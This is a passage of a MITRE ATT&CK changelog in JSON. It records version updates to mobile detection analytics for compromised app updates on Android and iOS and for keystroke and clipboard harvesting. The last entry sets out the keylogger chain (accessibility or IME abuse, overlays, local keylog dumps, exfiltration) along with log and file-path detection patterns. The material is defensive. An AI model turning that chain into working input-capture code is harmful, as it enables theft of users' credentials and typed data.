                    "name": "Analytic 1823",
                    "description": "A legitimate-seeming application or update is installed through an expected or previously trusted path, but shortly after first run or update the application exhibits new runtime behavior, sensor use, file staging, or network communications inconsistent with its historical baseline, documented role, or prior version. The defender specifically looks for behaviors commonly introduced by compromised third-party libraries or manipulated build tooling, such as unexpected background service activation, first-seen framework use, new permissions exercised, novel network destinations, or dropped local artifacts not aligned to the app's expected function.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "android:MDMLog",
                            "channel": "Managed app distribution, enterprise catalog trust, and update policy remain expected while a known package exhibits materially different post-install or post-update behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Known application version declares, gains, or first exercises storage, communications, accessibility, advertising, analytics, overlay, or sensor-adjacent capability inconsistent with prior version baseline or business role"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "android:MDMLog",
                            "channel": "Newly installed or updated application launches background service, becomes active without recent user interaction, or executes immediately after update in a pattern inconsistent with baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum span between install/update or first launch and the first suspicious behavior drift."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to add services, libraries, or destinations because of approved releases."
                        },
                        {
                            "field": "AllowedVersionChangeWindow",
                            "description": "Grace period after an approved release during which limited behavior drift may be expected."
                        },
                        {
                            "field": "CapabilityDriftThreshold",
                            "description": "Threshold for how many new permissions or capabilities are tolerated before behavior is considered suspicious."
                        },
                        {
                            "field": "SensorDriftThreshold",
                            "description": "Threshold for newly used sensors or privacy-sensitive resources that are tolerated for a known app."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether certain framework or sensor behaviors should only be treated as suspicious when they occur without visible user interaction."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Time threshold for distinguishing autonomous post-update execution from normal first-run user activity."
                        },
                        {
                            "field": "DestinationAllowList",
                            "description": "Expected domains, CDNs, telemetry services, or APIs associated with approved app updates and known SDKs."
                        },
                        {
                            "field": "BehaviorBaselinePopulation",
                            "description": "Devices, versions, or user cohorts used to define normal behavior for the app."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum span between install/update or first launch and the first suspicious behavior drift.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to add services, libraries, or destinations because of approved releases.\"}, {\"field\": \"AllowedVersionChangeWindow\", \"description\": \"Grace period after an approved release during which limited behavior drift may be expected.\"}, {\"field\": \"CapabilityDriftThreshold\", \"description\": \"Threshold for how many new permissions or capabilities are tolerated before behavior is considered suspicious.\"}, {\"field\": \"SensorDriftThreshold\", \"description\": \"Threshold for newly used sensors or privacy-sensitive resources that are tolerated for a known app.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether certain framework or sensor behaviors should only be treated as suspicious when they occur without visible user interaction.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Time threshold for distinguishing autonomous post-update execution from normal first-run user activity.\"}, {\"field\": \"DestinationAllowList\", \"description\": \"Expected domains, CDNs, telemetry services, or APIs associated with approved app updates and known SDKs.\"}, {\"field\": \"BehaviorBaselinePopulation\", \"description\": \"Devices, versions, or user cohorts used to define normal behavior for the app.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-13 23:48:31.416000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A legitimate-seeming application or update is installed through an expected or previously trusted path, but shortly after first run or update the application exhibits new runtime behavior, sensor use, file staging, or network communications inconsistent with its historical baseline, documented role, or prior version. The defender specifically looks for behaviors commonly introduced by compromised third-party libraries or manipulated build tooling, such as unexpected background service activation, first-seen framework use, new permissions exercised, novel network destinations, or dropped local artifacts not aligned to the app's expected function.\", \"old_value\": \"Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app distribution, enterprise catalog trust, and update policy remain expected while a known package exhibits materially different post-install or post-update behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Known application version declares, gains, or first exercises storage, communications, accessibility, advertising, analytics, overlay, or sensor-adjacent capability inconsistent with prior version baseline or business role\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"android:MDMLog\", \"channel\": \"Newly installed or updated application launches background service, becomes active without recent user interaction, or executes immediately after update in a pattern inconsistent with baseline\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to89__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to89__0\"><a href=\"#difflib_chg_to89__top\">t</a></td><td class=\"diff_header\" id=\"from89_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries&nbsp;could&nbsp;b</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to89__top\">t</a></td><td class=\"diff_header\" id=\"to89_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;legitimate-seeming&nbsp;application&nbsp;or&nbsp;update&nbsp;is&nbsp;installed&nbsp;thro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;detected&nbsp;by&nbsp;application&nbsp;vetting&nbsp;services.&nbsp;Malicious&nbsp;softwa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ugh&nbsp;an&nbsp;expected&nbsp;or&nbsp;previously&nbsp;trusted&nbsp;path,&nbsp;but&nbsp;shortly&nbsp;afte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">re&nbsp;development&nbsp;tools&nbsp;could&nbsp;be&nbsp;detected&nbsp;by&nbsp;enterprises&nbsp;that&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;first&nbsp;run&nbsp;or&nbsp;update&nbsp;the&nbsp;application&nbsp;exhibits&nbsp;new&nbsp;runtime&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">eploy&nbsp;endpoint&nbsp;protection&nbsp;software&nbsp;on&nbsp;computers&nbsp;that&nbsp;are&nbsp;use</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ehavior,&nbsp;sensor&nbsp;use,&nbsp;file&nbsp;staging,&nbsp;or&nbsp;network&nbsp;communications</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">d&nbsp;to&nbsp;develop&nbsp;mobile&nbsp;apps.&nbsp;Application&nbsp;vetting&nbsp;could&nbsp;detect&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;inconsistent&nbsp;with&nbsp;its&nbsp;historical&nbsp;baseline,&nbsp;documented&nbsp;role,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;prior&nbsp;version.&nbsp;The&nbsp;defender&nbsp;specifically&nbsp;looks&nbsp;for&nbsp;behav</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">iors&nbsp;commonly&nbsp;introduced&nbsp;by&nbsp;compromised&nbsp;third-party&nbsp;librarie</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;or&nbsp;manipulated&nbsp;build&nbsp;tooling,&nbsp;such&nbsp;as&nbsp;unexpected&nbsp;backgroun</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;service&nbsp;activation,&nbsp;first-seen&nbsp;framework&nbsp;use,&nbsp;new&nbsp;permissi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ons&nbsp;exercised,&nbsp;novel&nbsp;network&nbsp;destinations,&nbsp;or&nbsp;dropped&nbsp;local&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">artifacts&nbsp;not&nbsp;aligned&nbsp;to&nbsp;the&nbsp;app's&nbsp;expected&nbsp;function.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7a209f60-7f43-407f-b5bd-7877e10222ee",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-16 15:56:09.700000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0704#AN1824",
                            "external_id": "AN1824"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1824",
                    "description": "A legitimate-seeming app or update arrives through an expected or trusted distribution path, but the delivered application begins showing new entitlement exercise, background activity, framework use, sensor access, or network behavior inconsistent with its prior baseline or documented role. Because direct inspection of compromised dependencies or developer tooling is weaker on iOS, the defender emphasizes supervised-device app inventory, post-update behavior drift, new first-run or background patterns, and downstream communications that suggest compromised embedded libraries or manipulated build outputs.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "iOS:MDMLog",
                            "channel": "Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum span between install/version change and first suspicious post-delivery behavior."
                        },
                        {
                            "field": "SupervisedOnly",
                            "description": "Whether the analytic should only apply to supervised devices with high-confidence managed app telemetry."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved apps expected to change capabilities, services, or destinations because of legitimate releases."
                        },
                        {
                            "field": "AllowedVersionChangeWindow",
                            "description": "Grace period after an approved release during which limited behavior drift may be expected."
                        },
                        {
                            "field": "CapabilityDriftThreshold",
                            "description": "Threshold for how much entitlement or capability drift is tolerated for a known app."
                        },
                        {
                            "field": "SensorDriftThreshold",
                            "description": "Threshold for newly used sensors or privacy-sensitive resources tolerated for a known app."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether certain behaviors should only be treated as suspicious when they occur without visible user interaction."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Threshold for distinguishing autonomous post-update activity from normal user-driven first-run behavior."
                        },
                        {
                            "field": "DestinationAllowList",
                            "description": "Expected domains, telemetry services, or APIs associated with approved app updates and known SDK behavior."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Maximum span between install/version change and first suspicious post-delivery behavior.\"}, {\"field\": \"SupervisedOnly\", \"description\": \"Whether the analytic should only apply to supervised devices with high-confidence managed app telemetry.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved apps expected to change capabilities, services, or destinations because of legitimate releases.\"}, {\"field\": \"AllowedVersionChangeWindow\", \"description\": \"Grace period after an approved release during which limited behavior drift may be expected.\"}, {\"field\": \"CapabilityDriftThreshold\", \"description\": \"Threshold for how much entitlement or capability drift is tolerated for a known app.\"}, {\"field\": \"SensorDriftThreshold\", \"description\": \"Threshold for newly used sensors or privacy-sensitive resources tolerated for a known app.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether certain behaviors should only be treated as suspicious when they occur without visible user interaction.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Threshold for distinguishing autonomous post-update activity from normal user-driven first-run behavior.\"}, {\"field\": \"DestinationAllowList\", \"description\": \"Expected domains, telemetry services, or APIs associated with approved app updates and known SDK behavior.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-16 15:56:09.700000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"A legitimate-seeming app or update arrives through an expected or trusted distribution path, but the delivered application begins showing new entitlement exercise, background activity, framework use, sensor access, or network behavior inconsistent with its prior baseline or documented role. Because direct inspection of compromised dependencies or developer tooling is weaker on iOS, the defender emphasizes supervised-device app inventory, post-update behavior drift, new first-run or background patterns, and downstream communications that suggest compromised embedded libraries or manipulated build outputs.\", \"old_value\": \"Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2\", \"name\": \"iOS:MDMLog\", \"channel\": \"Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to200__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to200__0\"><a href=\"#difflib_chg_to200__top\">t</a></td><td class=\"diff_header\" id=\"from200_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries&nbsp;could&nbsp;b</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to200__top\">t</a></td><td class=\"diff_header\" id=\"to200_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">A&nbsp;legitimate-seeming&nbsp;app&nbsp;or&nbsp;update&nbsp;arrives&nbsp;through&nbsp;an&nbsp;expect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;detected&nbsp;by&nbsp;application&nbsp;vetting&nbsp;services.&nbsp;Malicious&nbsp;softwa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;or&nbsp;trusted&nbsp;distribution&nbsp;path,&nbsp;but&nbsp;the&nbsp;delivered&nbsp;applicati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">re&nbsp;development&nbsp;tools&nbsp;could&nbsp;be&nbsp;detected&nbsp;by&nbsp;enterprises&nbsp;that&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;begins&nbsp;showing&nbsp;new&nbsp;entitlement&nbsp;exercise,&nbsp;background&nbsp;activ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">eploy&nbsp;endpoint&nbsp;protection&nbsp;software&nbsp;on&nbsp;computers&nbsp;that&nbsp;are&nbsp;use</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ity,&nbsp;framework&nbsp;use,&nbsp;sensor&nbsp;access,&nbsp;or&nbsp;network&nbsp;behavior&nbsp;incon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">d&nbsp;to&nbsp;develop&nbsp;mobile&nbsp;apps.&nbsp;Application&nbsp;vetting&nbsp;could&nbsp;detect&nbsp;t</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sistent&nbsp;with&nbsp;its&nbsp;prior&nbsp;baseline&nbsp;or&nbsp;documented&nbsp;role.&nbsp;Because&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">he&nbsp;usage&nbsp;of&nbsp;insecure&nbsp;or&nbsp;malicious&nbsp;third-party&nbsp;libraries.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">direct&nbsp;inspection&nbsp;of&nbsp;compromised&nbsp;dependencies&nbsp;or&nbsp;developer&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ooling&nbsp;is&nbsp;weaker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;defender&nbsp;emphasizes&nbsp;supervised-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">device&nbsp;app&nbsp;inventory,&nbsp;post-update&nbsp;behavior&nbsp;drift,&nbsp;new&nbsp;first-</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">run&nbsp;or&nbsp;background&nbsp;patterns,&nbsp;and&nbsp;downstream&nbsp;communications&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">at&nbsp;suggest&nbsp;compromised&nbsp;embedded&nbsp;libraries&nbsp;or&nbsp;manipulated&nbsp;bui</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ld&nbsp;outputs.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9b036696-9e1e-42b9-9bfd-3ae785e7e10e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 18:28:31.071000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0705#AN1825",
                            "external_id": "AN1825"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1825",
                    "description": "Defender observes an app gaining input-observation capability (AccessibilityService enablement, default IME set, draw-over-apps permission), then creating an intercept surface (overlay window, accessibility event stream consumption or IME keystroke callbacks), followed by persistence (local keylog/clipboard dump) and/or small, frequent network egress. Chain: capability/permission \u2192 listener/overlay activation \u2192 bursty input read events \u2192 local write \u2192 near-term exfil.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "android:logcat",
                            "channel": "Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "android:logcat",
                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Max time from input intercept to persist/exfil (e.g., 5\u201345s)."
                        },
                        {
                            "field": "MinInputEventBurst",
                            "description": "Minimum count of input events within window to flag harvesting (e.g., \u22655)."
                        },
                        {
                            "field": "OverlayRequired",
                            "description": "Require overlay creation if Accessibility not present (true/false)."
                        },
                        {
                            "field": "PersistPathRegex",
                            "description": "Regex for keylog/clipboard dump destinations in app container."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known-good analytics/CDN endpoints to suppress FPs."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background/Work Profile or Kiosk policy to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Max time from input intercept to persist/exfil (e.g., 5\\u201345s).\"}, {\"field\": \"MinInputEventBurst\", \"description\": \"Minimum count of input events within window to flag harvesting (e.g., \\u22655).\"}, {\"field\": \"OverlayRequired\", \"description\": \"Require overlay creation if Accessibility not present (true/false).\"}, {\"field\": \"PersistPathRegex\", \"description\": \"Regex for keylog/clipboard dump destinations in app container.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known-good analytics/CDN endpoints to suppress FPs.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background/Work Profile or Kiosk policy to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 18:28:31.071000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an app gaining input-observation capability (AccessibilityService enablement, default IME set, draw-over-apps permission), then creating an intercept surface (overlay window, accessibility event stream consumption or IME keystroke callbacks), followed by persistence (local keylog/clipboard dump) and/or small, frequent network egress. Chain: capability/permission \\u2192 listener/overlay activation \\u2192 bursty input read events \\u2192 